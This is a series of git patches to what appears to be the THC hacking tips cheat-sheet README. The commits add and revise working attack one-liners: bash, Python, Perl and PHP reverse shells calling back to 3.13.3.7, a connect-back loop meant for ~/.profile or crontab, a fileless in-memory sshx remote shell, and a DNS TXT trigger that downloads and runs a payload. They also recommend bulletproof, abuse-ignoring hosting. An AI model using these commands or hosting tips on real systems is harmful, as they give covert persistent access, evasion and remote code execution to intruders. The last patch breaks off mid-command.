From 1b59299de17cfd273d50cdfda992e2a84b45d775 Mon Sep 17 00:00:00 2001 From: Sean LaPlante Date: Wed, 25 Sep 2024 09:42:30 -0400 Subject: [PATCH 01/24] UPX: Handle 32-bit binaries that don't have PROT_EXEC|PROT_WRITE --- README.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 14943b8..c280961 100644 --- a/README.md +++ b/README.md @@ -2003,10 +2003,11 @@ Optionally cleanse signatures and traces of UPX: ```shell cat "${BIN}" \ | perl -e 'local($/);$_=<>;s/(.*)(\$Info:[^\0]*)(.*)/print "$1";print "\0"x length($2); print "$3"/es;' \ -| perl -e 'local($/);$_=<>;s/(.*)(\$Id:[^\0]*)(.*)/print "$1";print "\0"x length($2); print "$3"/es;' \ -| perl -e 'local($/);$_=<>;s/(.*)(PROT_EXEC\|PROT_WRI[^\0]*)(.*)/print "$1";print "\0"x length($2); print "$3"/es;' >"${BIN}.tmpupx" -cat "${BIN}.tmpupx" >"${BIN}" -rm -f "${BIN}.tmpupx" +| perl -e 'local($/);$_=<>;s/(.*)(\$Id:[^\0]*)(.*)/print "$1";print "\0"x length($2); print "$3"/es;' >"${BIN}.tmpupx" +mv "${BIN}.tmpupx" "${BIN}" +grep -Eq "PROT_EXEC\|PROT_WRITE" "${BIN}" \ +&& cat "${BIN}" | perl -e 'local($/);$_=<>;s/(.*)(PROT_EXEC\|PROT_WRI[^\0]*)(.*)/print "$1";print "\0"x length($2); print "$3"/es;' >"${BIN}.tmpupx" \ +&& mv "${BIN}.tmpupx" "${BIN}" perl -i -0777 -pe 's/UPX!/\0\0\0\0/sg' "${BIN}" ``` From c3672bf7005eb3a98e7b897c18cee34066d7c547 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 19 Feb 2025 06:07:49 +0000 Subject: [PATCH 02/24] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 35f13ac..4f5d569 100644 --- a/README.md +++ b/README.md @@ -2435,6 +2435,7 @@ https://thc.org/segfault Trusted VPN Providers 1. https://www.mullvad.net 1. https://www.cryptostorm.is +2. https://ivpn.net 1. https://proton.me - Offers FREE VPN 1. https://vpn.fail - Run by volunteers From df692d6c5fd7a5e4015f4f68137491bc17b493b9 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 19 Feb 2025 08:17:11 +0000 Subject: [PATCH 03/24] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 4f5d569..da6729c 100644 --- a/README.md +++ b/README.md @@ -2439,7 +2439,7 @@ Trusted VPN Providers 1. https://proton.me - Offers FREE VPN 1. https://vpn.fail - Run by volunteers -Virtual Private Servers +Virtual Private Servers. Please check [offshore.cat](https://offshore.cat/). 1. https://www.hetzner.com - Cheap 2. https://hivecloud.pw - No KYC. Bullet Proof. Accepts Crypto. 1. https://dmzhost.co - Ignore most abuse requests From c378c2018a52711dc24f7da5abb9a40c7a3615db Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 20 Feb 2025 20:09:33 +0000 Subject: [PATCH 04/24] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index da6729c..a065ca1 100644 --- a/README.md +++ b/README.md @@ -1851,7 +1851,7 @@ echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0 Can also be triggered via `~/.bashrc` or the user's crontab. Use (example): ```shell # Use a "double bash" to redirect _also_ $()-subshell error to /dev/null: -bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \"|base64 -d);}"'&>/dev/null +bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \"\ |base64 -d);}"'&>/dev/null ``` From f347fe887f3f0da008eebd7f61da8974d92d0180 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 21 Feb 2025 09:06:57 +0000 Subject: [PATCH 05/24] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a065ca1..052e3a5 100644 --- a/README.md +++ b/README.md @@ -1851,7 +1851,7 @@ echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0 Can also be triggered via `~/.bashrc` or the user's crontab. Use (example): ```shell # Use a "double bash" to redirect _also_ $()-subshell error to /dev/null: -bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \"\ |base64 -d);}"'&>/dev/null +bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 -d);}"'&>/dev/null ``` From a7a50e8e064b6ff0cc415d247df9ff719e665a67 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 24 Feb 2025 15:27:40 +0000 Subject: [PATCH 06/24] Update README.md --- README.md | 27 +++++++++++++++++++++++---- 1 file changed, 23 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 052e3a5..bfbb732 100644 --- a/README.md +++ b/README.md @@ -63,6 +63,7 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops) 3. [with OpenSSL (encrypted)](#sslshell) 1. [with remote.moe (encrypted)](#revese-shell-remote-moe) 1. [without /dev/tcp](#reverse-shell-no-bash) + 2. [with sshx.io (encrypted)](#sshx) 1. [with Python](#reverse-shell-python) 1. [with Perl](#reverse-shell-perl) 1. [with PHP](#reverse-shell-php) @@ -1612,8 +1613,26 @@ touch /tmp/.fio; tail -f /tmp/.fio | sh -i | telnet 3.13.3.7 31337 >/tmp/.fio ``` Note: Dont forget to `rm /tmp/.fio` after login. + +**5.i.g. Reverse shell with sshx.io (encrypted)** + +Access a remote shell from your web browser [https://sshx.io](https://sshx.io). + +```shell +curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null >.s \ +&& chmod 755 .s \ +&& (PATH=.:$PATH s -q >.url 2>/dev/null &); +for x in {0..10}; do [ -f .url ] && break;sleep 1; done; +cat .u;rm -rf .u .s; +``` + +Or pipe directly into memory: +```shell +cd /tmp;(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null|perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",@ARGV' -- "-q" >.u 2>/dev/null &);sleep 10;cat .u&&rm -f .u +``` + -**5.i.g. Reverse shell with remote.moe and ssh (encrypted)** +**5.i.h. Reverse shell with remote.moe and ssh (encrypted)** It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe): @@ -1640,13 +1659,13 @@ rm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r && mkfifo /tmp/.p & ``` -**5.i.h. Reverse shell with Python** +**5.i.i. Reverse shell with Python** ```sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` -**5.i.i. Reverse shell with Perl** +**5.i.j. Reverse shell with Perl** ```sh # method 1 @@ -1655,7 +1674,7 @@ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotob perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' ``` -**5.i.j. Reverse shell with PHP** +**5.i.k. Reverse shell with PHP** ```sh php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' From a31e9de4f2b3289f3a78374be8455a0070502b0a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 24 Feb 2025 15:33:41 +0000 Subject: [PATCH 07/24] Update README.md --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index bfbb732..c3b53e9 100644 --- a/README.md +++ b/README.md @@ -1621,9 +1621,8 @@ Access a remote shell from your web browser [https://sshx.io](https://sshx.io). ```shell curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null >.s \ && chmod 755 .s \ -&& (PATH=.:$PATH s -q >.url 2>/dev/null &); -for x in {0..10}; do [ -f .url ] && break;sleep 1; done; -cat .u;rm -rf .u .s; +&& (PATH=.:$PATH .s -q >.u 2>/dev/null &); +sleep 10;cat .u;rm -rf .u .s; ``` Or pipe directly into memory: From 556ddfece24c50ce9656d8caa38355c8f22bbe65 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 24 Feb 2025 15:35:42 +0000 Subject: [PATCH 08/24] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c3b53e9..687df6c 100644 --- a/README.md +++ b/README.md @@ -1622,7 +1622,7 @@ Access a remote shell from your web browser [https://sshx.io](https://sshx.io). curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null >.s \ && chmod 755 .s \ && (PATH=.:$PATH .s -q >.u 2>/dev/null &); -sleep 10;cat .u;rm -rf .u .s; +sleep 10;cat .u;rm -f .u .s; ``` Or pipe directly into memory: From e48fa6797e6bbab2ea5a07f0bbed1bccabd8ef01 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 24 Feb 2025 15:40:06 +0000 Subject: [PATCH 09/24] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 687df6c..a3db531 100644 --- a/README.md +++ b/README.md @@ -1622,7 +1622,7 @@ Access a remote shell from your web browser [https://sshx.io](https://sshx.io). curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null >.s \ && chmod 755 .s \ && (PATH=.:$PATH .s -q >.u 2>/dev/null &); -sleep 10;cat .u;rm -f .u .s; +for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s; ``` Or pipe directly into memory: From 17af5a04fa50e4c943cd661a3620e186a36ae87d Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 25 Feb 2025 08:49:28 +0000 Subject: [PATCH 10/24] Update README.md --- README.md | 18 +++++++++++++----- 1 file changed, 13 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index a3db531..6013588 100644 --- a/README.md +++ b/README.md @@ -45,7 +45,7 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops) 1. [Data Upload/Download/Exfil](#exfil) 1. [File Encoding/Decoding](#file-encoding) 1. [File transfer using cut & paste](#cut-paste) - 1. [File transfer using screen](#xfer-tmux) + 1. [File transfer using tmux](#xfer-tmux) 1. [File transfer using screen](#file-transfer-screen) 1. [File transfer using gs-netcat and sftp](#file-transfer-gs-netcat) 1. [File transfer using HTTP](#http) @@ -72,7 +72,6 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops) 1. [Upgrade a reverse shell to a fully interactive shell](#reverse-shell-interactive) 1. [Reverse shell with socat (fully interactive)](#reverse-shell-socat) 1. [Backdoors](#backdoor) - 1. [Background reverse shell](#backdoor-background-reverse-shell) 1. [authorized_keys](#backdoor-auth-keys) 1. [Remote access an entire network](#backdoor-network) 1. [Smallest PHP backdoor](#php-backdoor) @@ -1525,11 +1524,17 @@ pwncat -lp 1524 On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt: ```sh # If the current shell is Bash already: -(bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) & +(bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 &) # If the current shell is NOT Bash then we need: -bash -c '(exec bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &' +bash -c '(exec bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 &)' # or hide the bash process as 'kqueue' -bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &' +bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 &)' +``` + +Alternatively, on the remote system, put this into the `~/.profile` or crontab to re-start the connect-back shell (and also stiops multiple intances from being started): + +```sh +fuser /dev/shm/.busy &>/dev/null || (bash -c 'while :; do touch /dev/shm/.busy; exec 3/dev/tcp/3.13.3.7/1524 0>&1; sleep 360; done' &>/dev/null &) ``` @@ -1754,6 +1759,9 @@ LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/ys)" # Notice '/ys' in ``` + +See also [asdf](#reverse-shell). + **6.i. Background reverse shell** A reverse shell that keeps trying to connect back to us every 360 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected. From 25467700a32ce6f2ee340b388ba519d2bbf85aa1 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 25 Feb 2025 08:56:16 +0000 Subject: [PATCH 11/24] Update README.md --- README.md | 20 ++++---------------- 1 file changed, 4 insertions(+), 16 deletions(-) diff --git a/README.md b/README.md index 6013588..35055f2 100644 --- a/README.md +++ b/README.md @@ -1493,19 +1493,7 @@ curl -sF document=@file.zip "https://api.telegram.org/bot/sendDocu **5.i.a. Reverse shell with gs-netcat (encrypted)** -Use [gsocket deploy](https://gsocket.io/deploy). It spawns a fully functioning PTY reverse shell. Both, the YOU and the remote system, can be behind NAT and the traffic is routed via a relay network. It also supports file upload/download (Ctrl-e c) and alarms when the admin logs in. If netcat is a swiss army knife than gs-netcat is a german battle axe :> - -```sh -X=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/y)" -# or X=ExampleSecretChangeMe bash -c "$(wget --no-verbose -O- https://gsocket.io/y)" -``` - -To connect to the shell from your workstation: -```sh -S=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/y)" -# or gs-netcat -s ExampleSecretChangeMe -i -# Add -T to tunnel through TOR -``` +See [6. Backdoors](#backdoor) for a 1-liner to deploy and access a fully functioning PTY reverse shell using [https://gsocket.io/deploy](https://gsocket.io/deploy). **5.i.b. Reverse shell with Bash** @@ -1744,6 +1732,7 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524 ## 6. Backdoors + Mostly we use gs-netcat's automated deployment script: [https://www.gsocket.io/deploy](https://www.gsocket.io/deploy). ```sh bash -c "$(curl -fsSLk https://gsocket.io/y)" @@ -1758,10 +1747,9 @@ or deploy gsocket by running your own deployment server: LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/ys)" # Notice '/ys' instead of '/y' ``` +See [Reverse Shell / Dumb Shell](#reverse-shell) for simple 1-liner reverse shells. + - -See also [asdf](#reverse-shell). - **6.i. Background reverse shell** A reverse shell that keeps trying to connect back to us every 360 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected. From 1ca069f605f185a78356cad5b3124d1f5fcc2fb3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 25 Feb 2025 09:00:07 +0000 Subject: [PATCH 12/24] Update README.md --- README.md | 20 ++++---------------- 1 file changed, 4 insertions(+), 16 deletions(-) diff --git a/README.md b/README.md index 35055f2..bdd376a 100644 --- a/README.md +++ b/README.md @@ -1732,7 +1732,11 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524 ## 6. Backdoors +See [Reverse Shell / Dumb Shell](#reverse-shell) for simple 1-liner reverse shells. + +**6.i. Reverse shell using gs-netcat** + Mostly we use gs-netcat's automated deployment script: [https://www.gsocket.io/deploy](https://www.gsocket.io/deploy). ```sh bash -c "$(curl -fsSLk https://gsocket.io/y)" @@ -1747,22 +1751,6 @@ or deploy gsocket by running your own deployment server: LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/ys)" # Notice '/ys' instead of '/y' ``` -See [Reverse Shell / Dumb Shell](#reverse-shell) for simple 1-liner reverse shells. - - -**6.i. Background reverse shell** - -A reverse shell that keeps trying to connect back to us every 360 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected. - -```sh -setsid bash -c 'while :; do bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 360; done' &>/dev/null -``` - -or the user's *~/.profile* (also stops multiple instances from being started): -```sh -fuser /dev/shm/.busy &>/dev/null || nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3/dev/tcp/3.13.3.7/1524 0>&1 ; sleep 360; done' &>/dev/null & -``` - **6.ii. authorized_keys** From 80a6c97ec2852e12c888f1cf80d6aa85b8e856d6 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 25 Feb 2025 09:02:20 +0000 Subject: [PATCH 13/24] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index bdd376a..6996f43 100644 --- a/README.md +++ b/README.md @@ -72,6 +72,7 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops) 1. [Upgrade a reverse shell to a fully interactive shell](#reverse-shell-interactive) 1. [Reverse shell with socat (fully interactive)](#reverse-shell-socat) 1. [Backdoors](#backdoor) + 1. [Reverse shell using gs-netcat](#gsnc) 1. [authorized_keys](#backdoor-auth-keys) 1. [Remote access an entire network](#backdoor-network) 1. [Smallest PHP backdoor](#php-backdoor) From e57bdb610bd8bc41835a0fd04efe80c72ea6c818 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 25 Feb 2025 09:10:56 +0000 Subject: [PATCH 14/24] Update README.md --- README.md | 47 ++++++++++++++++++++++++----------------------- 1 file changed, 24 insertions(+), 23 deletions(-) diff --git a/README.md b/README.md index 6996f43..d39ba58 100644 --- a/README.md +++ b/README.md @@ -63,7 +63,6 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops) 3. [with OpenSSL (encrypted)](#sslshell) 1. [with remote.moe (encrypted)](#revese-shell-remote-moe) 1. [without /dev/tcp](#reverse-shell-no-bash) - 2. [with sshx.io (encrypted)](#sshx) 1. [with Python](#reverse-shell-python) 1. [with Perl](#reverse-shell-perl) 1. [with PHP](#reverse-shell-php) @@ -72,7 +71,8 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops) 1. [Upgrade a reverse shell to a fully interactive shell](#reverse-shell-interactive) 1. [Reverse shell with socat (fully interactive)](#reverse-shell-socat) 1. [Backdoors](#backdoor) - 1. [Reverse shell using gs-netcat](#gsnc) + 1. [gs-netcat](#gsnc) + 2. [sshx.io](#sshx) 1. [authorized_keys](#backdoor-auth-keys) 1. [Remote access an entire network](#backdoor-network) 1. [Smallest PHP backdoor](#php-backdoor) @@ -1607,22 +1607,7 @@ touch /tmp/.fio; tail -f /tmp/.fio | sh -i | telnet 3.13.3.7 31337 >/tmp/.fio ``` Note: Dont forget to `rm /tmp/.fio` after login. - -**5.i.g. Reverse shell with sshx.io (encrypted)** -Access a remote shell from your web browser [https://sshx.io](https://sshx.io). - -```shell -curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null >.s \ -&& chmod 755 .s \ -&& (PATH=.:$PATH .s -q >.u 2>/dev/null &); -for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s; -``` - -Or pipe directly into memory: -```shell -cd /tmp;(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null|perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",@ARGV' -- "-q" >.u 2>/dev/null &);sleep 10;cat .u&&rm -f .u -``` **5.i.h. Reverse shell with remote.moe and ssh (encrypted)** @@ -1751,9 +1736,25 @@ or deploy gsocket by running your own deployment server: ```sh LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/ys)" # Notice '/ys' instead of '/y' ``` + +**6.ii. Reverse shell with sshx.io (encrypted)** + +Access a remote shell from your web browser [https://sshx.io](https://sshx.io). + +```shell +curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null >.s \ +&& chmod 755 .s \ +&& (PATH=.:$PATH .s -q >.u 2>/dev/null &); +for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s; +``` + +Or pipe directly into memory: +```shell +cd /tmp;(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null|perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",@ARGV' -- "-q" >.u 2>/dev/null &);sleep 10;cat .u&&rm -f .u +``` -**6.ii. authorized_keys** +**6.iii. authorized_keys** Add your ssh public key to */root/.ssh/authorized_keys*. It's the most reliable backdoor ever :> @@ -1770,7 +1771,7 @@ u1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu ``` -**6.iii. Remote Access to an entire network** +**6.vi. Remote Access to an entire network** Install [gs-netcat](https://github.com/hackerschoice/gsocket). It creates a SOCKS exit-node on the Host's private LAN which is accessible through the Global Socket Relay Network without the need to run your own relay-server (e.g. access the remote private LAN directly from your workstation): @@ -1792,7 +1793,7 @@ Other methods: * [Reverse Wireguard](https://thc.org/segfault/wireguard) - from segfault.net to any (internal) network. -**6.iv. Smallest PHP Backdoor** +**6.v. Smallest PHP Backdoor** Add this line at the beginning of any PHP file: ```php @@ -1833,7 +1834,7 @@ curl http://127.0.0.1:8080/x.php -d0='' -d1='echo file_get_contents("/etc/hosts" ``` -**6.v. Smallest reverse DNS-tunnel Backdoor** +**6.vi. Smallest reverse DNS-tunnel Backdoor** Execute arbitrary commands on a server that is _not_ accessible from the public Internet by using a reverse DNS trigger. @@ -1858,7 +1859,7 @@ bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 ``` -**6.vi. Local Root Backdoor** +**6.vii. Local Root Backdoor** #### 1. Backdooring the dynamic loader with setcap @@ -1886,7 +1887,7 @@ exec /var/tmp/.b00m -p -c 'exec python -c "import os;os.setuid(0);os.execlp(\"ba ``` -**6.vii. Self-Extracting implant** +**6.viii. Self-Extracting implant** Create a self-extracting shell-script using [mkegg.sh](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/mkegg.sh) (see source for examples). From a4f11c24876576205bf137799cee707648da51e7 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 25 Feb 2025 09:39:33 +0000 Subject: [PATCH 15/24] Update README.md --- README.md | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index d39ba58..6b06a4e 100644 --- a/README.md +++ b/README.md @@ -1850,13 +1850,15 @@ echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0 - The DNS TXT payload is limited to 2,048 characters (sometimes 65,535 characters). - The implant is a `bootloader`. Use a while loop to download and execute larger paypload via DNS. -- Check out our favorite places to [register a domain anonymously](#pub): +- Check out our favorite places to [register a domain anonymously](#pub). [Cloudflare's](https://www.cloudflare.com) Free-Tier is a good start. Can also be triggered via `~/.bashrc` or the user's crontab. Use (example): ```shell # Use a "double bash" to redirect _also_ $()-subshell error to /dev/null: bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 -d);}"'&>/dev/null ``` +(the example payload creates `/tmp/.b00m` and notifies us via another DNS request to [interactsh](https://interactsh.com). + **6.vii. Local Root Backdoor** @@ -2620,12 +2622,14 @@ Exfil Publishing 1. [free BT/DC/eD2k seedbox](https://valdikss.org.ru/schare/) -1. Or use /onion on [segfault.net](https://www.thc.org/segfault) or plain old https with ngrok. +1. Or use /onion on [segfault.net](https://www.thc.org/segfault) or plain old https with ngrok +2. [Cloudflare](https://www.cloudflare.com) - The Free-Tier allows most things (dns + domains + tunnels). +1. [Njal.la](https://njal.la) - Privacy focused Domain Registrar 1. [DuckDNS](https://www.duckdns.org/) - Free Domain Names 1. [AnonDNS](https://anondns.net/) - Free Domain Name (anonymous) 1. [afraid.org](https://www.afraid.org) - Free Dynamic DNS for your domain -2. [hostwinds](https://hostwinds.com) - Pay with crypto -3. [unstoppable domains](https://unstoppabledomains.com) - Pay with crypto +1. [hostwinds](https://hostwinds.com) - Pay with crypto +1. [unstoppable domains](https://unstoppabledomains.com) - Pay with crypto 1. [he.net](https://dns.he.net/) - Free Nameserver service 1. [0bin](https://0bin.net/) / [paste.ec](https://paste.ec) - Encrypted PasteBin 1. [pad.riseup.net](https://pad.riseup.net) - Create documents and share them securely From 8f56ba2a7954ae4ab3454ac815d4988d5e9e25fe Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 25 Feb 2025 09:40:33 +0000 Subject: [PATCH 16/24] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 6b06a4e..74057d2 100644 --- a/README.md +++ b/README.md @@ -1857,7 +1857,7 @@ Can also be triggered via `~/.bashrc` or the user's crontab. Use (example): # Use a "double bash" to redirect _also_ $()-subshell error to /dev/null: bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 -d);}"'&>/dev/null ``` -(the example payload creates `/tmp/.b00m` and notifies us via another DNS request to [interactsh](https://interactsh.com). +(the example payload creates `/tmp/.b00m` and notifies us via another DNS request to [interactsh](https://app.interactsh.com). From 4029b41e53cf856fc3218704b1e12654cb62e8e6 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 25 Feb 2025 09:41:47 +0000 Subject: [PATCH 17/24] Update README.md --- README.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/README.md b/README.md index 74057d2..0c3b485 100644 --- a/README.md +++ b/README.md @@ -1857,8 +1857,6 @@ Can also be triggered via `~/.bashrc` or the user's crontab. Use (example): # Use a "double bash" to redirect _also_ $()-subshell error to /dev/null: bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 -d);}"'&>/dev/null ``` -(the example payload creates `/tmp/.b00m` and notifies us via another DNS request to [interactsh](https://app.interactsh.com). - **6.vii. Local Root Backdoor** From 88c5dc76db82d06d46d0ca0aed5350b74246eecc Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 26 Feb 2025 08:49:42 +0000 Subject: [PATCH 18/24] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0c3b485..59633d8 100644 --- a/README.md +++ b/README.md @@ -1750,7 +1750,7 @@ for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s; Or pipe directly into memory: ```shell -cd /tmp;(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null|perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",@ARGV' -- "-q" >.u 2>/dev/null &);sleep 10;cat .u&&rm -f .u +echo $(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null|nohup perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}"/usr/bin/python3",@ARGV' -- "-q" 2>/dev/null|{ read x;echo "$x";}&) ``` From 4a980fcbde24db3a3e1c43f049ac7856dfcfddb7 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 26 Feb 2025 08:57:40 +0000 Subject: [PATCH 19/24] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 59633d8..80da216 100644 --- a/README.md +++ b/README.md @@ -1750,7 +1750,7 @@ for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s; Or pipe directly into memory: ```shell -echo $(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null|nohup perl 